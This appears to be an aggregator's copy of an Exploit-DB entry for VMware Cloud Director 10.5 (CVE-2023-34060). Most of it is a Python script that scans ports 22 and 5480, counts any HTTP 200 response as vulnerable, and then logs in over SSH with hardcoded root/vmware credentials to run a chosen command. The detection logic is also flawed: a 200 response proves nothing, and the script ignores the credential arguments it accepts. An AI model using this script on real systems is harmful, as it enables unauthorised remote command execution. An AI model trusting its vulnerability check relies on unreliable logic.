3

[remote] VMware Cloud Director 10.5 - Bypass identity verification

 6 months ago
source link: https://www.exploit-db.com/exploits/51882
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

VMware Cloud Director 10.5 - Bypass identity verification

EDB-ID:

51882

EDB Verified:

Platform:

Multiple

Date:

2024-03-12

Vulnerable App:

# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading

# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except:
        # The port is closed
        return False
    finally:
        # Close the socket
        s.close()

# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target using the credentials
    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open, send a GET request to the port and check the status code
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK